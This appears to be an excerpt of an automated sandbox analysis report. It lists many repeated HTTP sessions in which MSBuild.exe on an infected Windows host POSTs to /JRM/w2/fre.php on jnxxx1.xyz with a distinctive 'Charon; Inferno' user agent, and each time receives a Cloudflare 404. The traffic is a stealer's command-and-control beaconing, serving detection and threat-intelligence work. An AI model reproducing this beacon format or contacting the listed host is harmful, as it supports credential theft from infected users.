                  19192.168.2.449791172.67.198.11180C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 14:25:51.752907991 CET1379OUTPOST /JRM/w2/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: jnxxx1.xyz
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 45365306
                  Content-Length: 163
                  Connection: close
                  Jan 14, 2022 14:25:52.128684998 CET1380INHTTP/1.1 404 Not Found
                  Date: Fri, 14 Jan 2022 13:25:52 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Ftz2WOk1p%2BDDAbf5X9IOG9113w6gCMkpMwhBgkDAFd3Q%2FYEbCO5G5AUB0oNVxHMiDfMaFilkV3DQUXxCsFq2rycZzsswGgs82RcZROk0Bw7tXhpkTKBzxX5%2BT9F2"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 6cd7315688288b8a-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  2192.168.2.449772172.67.198.11180C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 14:25:21.284630060 CET1235OUTPOST /JRM/w2/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: jnxxx1.xyz
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 45365306
                  Content-Length: 163
                  Connection: close
                  Jan 14, 2022 14:25:22.203110933 CET1236INHTTP/1.1 404 Not Found
                  Date: Fri, 14 Jan 2022 13:25:22 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wfRwINA8sizrSXJoN1k3qO6EE7W9%2FUVuj%2F9R9GnQ2koZzil1mauU3M9CDhUOGqCQa974KV1DUJtCRSnjA1y6GBUIFUMm0T8vH8aXmpJ5uHb%2Fd1Ujk4nxbnF0CdbT"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 6cd7309819b78745-DUS
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  20192.168.2.449792104.21.60.17180C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 14:25:53.149995089 CET1380OUTPOST /JRM/w2/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: jnxxx1.xyz
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 45365306
                  Content-Length: 163
                  Connection: close
                  Jan 14, 2022 14:25:53.673243999 CET1381INHTTP/1.1 404 Not Found
                  Date: Fri, 14 Jan 2022 13:25:53 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wDGp1Oy9HbaC4yr2lUMdpdFPuUFOf4XKBQmLKcz%2B%2FGOF3Qi0E%2FBBx%2BOGiKvEXsBwxoaqsQTZSamfYBlZf8b0RA81%2BDty9I1Dtr5uZlJk7JEAveVTZOu3cfKlGl1F"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 6cd7315f49a2716e-DUS
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  21192.168.2.449793104.21.60.17180C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 14:25:54.980187893 CET1382OUTPOST /JRM/w2/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: jnxxx1.xyz
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 45365306
                  Content-Length: 163
                  Connection: close
                  Jan 14, 2022 14:25:55.532751083 CET1384INHTTP/1.1 404 Not Found
                  Date: Fri, 14 Jan 2022 13:25:55 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jCvc1U0c1tN8iO6BaKruFdADsQSpn5I1LqLJlB%2BzBz01yfvoHPAmlyy%2FMDZj4p7oybDxInvculkNpZdhfeRr4L1caCFmHWq1YrmXkjgwnTyl94jXHWZSNC2T4Ttc"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 6cd7316abb96717b-DUS
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  22192.168.2.449794172.67.198.11180C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 14:25:57.480514050 CET1384OUTPOST /JRM/w2/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: jnxxx1.xyz
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 45365306
                  Content-Length: 163
                  Connection: close
                  Jan 14, 2022 14:25:57.907254934 CET1385INHTTP/1.1 404 Not Found
                  Date: Fri, 14 Jan 2022 13:25:57 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uHfXZBYQdshooUaQuzbYJcvo9mOuNBa76dW4JZDk4UArpHKYn%2Fc%2BszzOH07CY4vbXKzBK2ZoeBEX5GaOGMSjayGafdHfYhmOususAbHIflJpDP%2Fb0N%2BDR4BtqVZx"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 6cd7317a5b3c409f-CDG
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  23192.168.2.449795172.67.198.11180C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 14:25:59.305784941 CET1386OUTPOST /JRM/w2/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: jnxxx1.xyz
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 45365306
                  Content-Length: 163
                  Connection: close
                  Jan 14, 2022 14:25:59.681890011 CET1388INHTTP/1.1 404 Not Found
                  Date: Fri, 14 Jan 2022 13:25:59 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SMTPnJ325vghWLNNjG2zelmaLADkubjhY3eMe4D37v4kPwvlXilvMCK%2FK94aUpgg26lOVcet33gjLb3R4F3U8iucT1AzCaBDoALvhB0jFmdasLsb3QnLuKtesfzf"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 6cd73185bea64eaf-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  24192.168.2.449796172.67.198.11180C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 14:26:01.263489962 CET1389OUTPOST /JRM/w2/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: jnxxx1.xyz
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 45365306
                  Content-Length: 163
                  Connection: close
                  Jan 14, 2022 14:26:01.693718910 CET1390INHTTP/1.1 404 Not Found
                  Date: Fri, 14 Jan 2022 13:26:01 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=atqdpgwD3aXEHkvBrkTfE0gOJhiOB%2FVogHc%2Fr3MT9S%2BaVfj%2BWsubd9uuf%2B1PrHsXXeCrWTWsH%2FrzCTAFKpaHUBx5oGrvQHmybKb6RcHUjdFM7c79XL7%2BKD7LRwF%2B"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 6cd73191f9fa0b88-AMS
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  25192.168.2.449797104.21.60.17180C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 14:26:02.695748091 CET1391OUTPOST /JRM/w2/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: jnxxx1.xyz
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 45365306
                  Content-Length: 163
                  Connection: close
                  Jan 14, 2022 14:26:03.051789999 CET1392INHTTP/1.1 404 Not Found
                  Date: Fri, 14 Jan 2022 13:26:03 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sVSQx7JSh5kkI06QpSl7v55J7KKqO9lFEn2iMRzg6%2BUOeU%2Fy3Aq6IG5kV1FHqakiZzz4EicIyOGG8RnMuqxDZLPypqcmJO2U0hc%2B2zZd%2BwmLacxzYdzWPgrdjk1f"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 6cd7319aed0d8bf3-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  26192.168.2.449798104.21.60.17180C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 14:26:04.152079105 CET1393OUTPOST /JRM/w2/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: jnxxx1.xyz
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 45365306
                  Content-Length: 163
                  Connection: close
                  Jan 14, 2022 14:26:05.166765928 CET1394INHTTP/1.1 404 Not Found
                  Date: Fri, 14 Jan 2022 13:26:05 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rV3S9lOgi8z1FfYbFIHzMOM6aDgwG5U6YR15jhb38BDbjcsPQLIBWG6uxn0vl%2BLFkOwnqhPhVHiE5J91GO215rZ%2B49bV5mb%2FFIVHhPTM2BvhV3YC96lKRa6xigXA"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 6cd731a40ef5695b-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  27192.168.2.449800104.21.60.17180C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 14:26:06.129703999 CET1401OUTPOST /JRM/w2/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: jnxxx1.xyz
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 45365306
                  Content-Length: 163
                  Connection: close
                  Jan 14, 2022 14:26:06.518989086 CET1444INHTTP/1.1 404 Not Found
                  Date: Fri, 14 Jan 2022 13:26:06 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=M6pCooKyP1ogsWi7vXjAPUvz6pO8KFflAkgCXcVje77%2BRl%2BCrMNWz04vzD9V56Bgb3opkx4MKrUFcyLnJD3GtGJoxdzG2BnCib2blh023Qa%2FXk9sFw0dS8Ngjnj9"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 6cd731b06cf6b787-CDG
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  28192.168.2.449807104.21.60.17180C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 14:26:07.683357000 CET1543OUTPOST /JRM/w2/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: jnxxx1.xyz
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 45365306
                  Content-Length: 163
                  Connection: close
                  Jan 14, 2022 14:26:08.067053080 CET1626INHTTP/1.1 404 Not Found
                  Date: Fri, 14 Jan 2022 13:26:08 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LdEYtIthMhRiRyTxJferZj3fyklSP6%2FZg3xS2f6sYT45iOUxDIiJcy%2BakoBX0c4%2FzVEOjpZ7B0OUN%2F2JYaOsI5MQ2y1kmF4Vtg1jsz4qgqZxeSukFFtc6EDz76yb"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 6cd731ba1b04694c-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  29192.168.2.449819172.67.198.11180C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 14:26:10.439182997 CET1958OUTPOST /JRM/w2/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: jnxxx1.xyz
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 45365306
                  Content-Length: 163
                  Connection: close
                  Jan 14, 2022 14:26:11.098567963 CET2156INHTTP/1.1 404 Not Found
                  Date: Fri, 14 Jan 2022 13:26:11 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Mves1NIsqvGBXag2QTG5swHj6IlRSm5idrymSWQcEoWrRdDvxa1bU8fIDEM%2B%2F0Z%2FRrcnEFFneKoJmx5%2BnUrNE82UB4%2BF3K81ufWM%2FBCxwyea3ilLxKIlui3%2FCA0a"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 6cd731cb59cf7181-DUS
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  3192.168.2.449773104.21.60.17180C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 14:25:23.253971100 CET1236OUTPOST /JRM/w2/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: jnxxx1.xyz
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 45365306
                  Content-Length: 163
                  Connection: close
                  Jan 14, 2022 14:25:23.789335012 CET1237INHTTP/1.1 404 Not Found
                  Date: Fri, 14 Jan 2022 13:25:23 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=R%2F%2BK8SVfC5ohsf5ypjZukQUxybr3HAsQTWDtDcDXSbnMW9JxaZP7acpJr4RKulgYRMQXJGPwP7krkH7BnrCvF3%2BRLS0lw1BmgNMJsLjE91QANmfP8BBqYRwu5bgj"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 6cd730a4692e7a49-DUS
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  30192.168.2.449834104.21.60.17180C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 14:26:12.298203945 CET2182OUTPOST /JRM/w2/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: jnxxx1.xyz
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 45365306
                  Content-Length: 163
                  Connection: close
                  Jan 14, 2022 14:26:13.323570013 CET2183INHTTP/1.1 404 Not Found
                  Date: Fri, 14 Jan 2022 13:26:12 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bKQFJy%2By3rfUww7H7Z%2BsceGDYiXyes8NRxtLSASqGUrKVcLsCy6QO%2BCNYQcm%2F4NH0wZEcVTX2Rad3zKZ1EvHomshSA2wXNg1jaMeWVZVrtiWw2h4fxr4hV7sTe8f"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 6cd731d6fd6f7a55-DUS
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  31192.168.2.449837172.67.198.11180C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 14:26:17.304219007 CET2194OUTPOST /JRM/w2/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: jnxxx1.xyz
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 45365306
                  Content-Length: 163
                  Connection: close
                  Jan 14, 2022 14:26:17.689928055 CET2224INHTTP/1.1 404 Not Found
                  Date: Fri, 14 Jan 2022 13:26:17 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KwDY2sA65K%2BVOpXcFoqUlqVHUxep0vH05eKs73Kv1HB4q%2FXh%2BNGRJ4J%2BcN5u7Nf28PpbKElf8SNdmcWnlFVtcE3DF9elXbvwVk07pupNLbq%2BdQwXBrSmjDrfUXxt"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 6cd731f63a1a4dca-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  32192.168.2.449839104.21.60.17180C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 14:26:21.377815962 CET2246OUTPOST /JRM/w2/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: jnxxx1.xyz
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 45365306
                  Content-Length: 163
                  Connection: close
                  Jan 14, 2022 14:26:21.929169893 CET2247INHTTP/1.1 404 Not Found
                  Date: Fri, 14 Jan 2022 13:26:21 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fCT4Kj%2BXgMLvYA0ag5GlxdCZDwJR8FXTC4VlXmyGO2K0YkZWUxqaHSMdOq63zoHjrYSu3hEfny9YxZLnlR3rhj9yMwitIrwP7i1tUbjo4Y%2Fi6sB6YSJCJRSUEXjN"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 6cd7320fb9c67163-DUS
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  33192.168.2.449845172.67.198.11180C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 14:26:25.951453924 CET3591OUTPOST /JRM/w2/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: jnxxx1.xyz
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 45365306
                  Content-Length: 163
                  Connection: close
                  Jan 14, 2022 14:26:26.320724964 CET5895INHTTP/1.1 404 Not Found
                  Date: Fri, 14 Jan 2022 13:26:26 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1lPu08ijR8xqa%2FLRHGm%2FgAv947c3opROPlGooJmrtx7LP15TbJ3lgpeEu51NzV1flv5m7EATqHr4fm9P9qcGIHysPEpKkBR32vSDO71PxNWyoQJR7A9z66HLmxRj"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 6cd7322c4c2b5c56-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  34192.168.2.449846104.21.60.17180C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 14:26:31.541838884 CET10009OUTPOST /JRM/w2/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: jnxxx1.xyz
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 45365306
                  Content-Length: 163
                  Connection: close
                  Jan 14, 2022 14:26:31.907454967 CET10010INHTTP/1.1 404 Not Found
                  Date: Fri, 14 Jan 2022 13:26:31 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Ne8o3Wm34pLjW7KScqi7R56w7QyjrCCugLyQyqTwFr2nLSqTFtyo5FDMWiKRP9lKBYPJIp1Lb7201a4Np8LJvBesvoOsOSPqMvz8ALSAUYxNLRuTuiARd4ibfIyz"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 6cd7324f3eb0535d-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  35192.168.2.449847172.67.198.11180C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 14:26:35.369697094 CET10011OUTPOST /JRM/w2/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: jnxxx1.xyz
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 45365306
                  Content-Length: 163
                  Connection: close
                  Jan 14, 2022 14:26:35.928399086 CET10012INHTTP/1.1 404 Not Found
                  Date: Fri, 14 Jan 2022 13:26:35 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
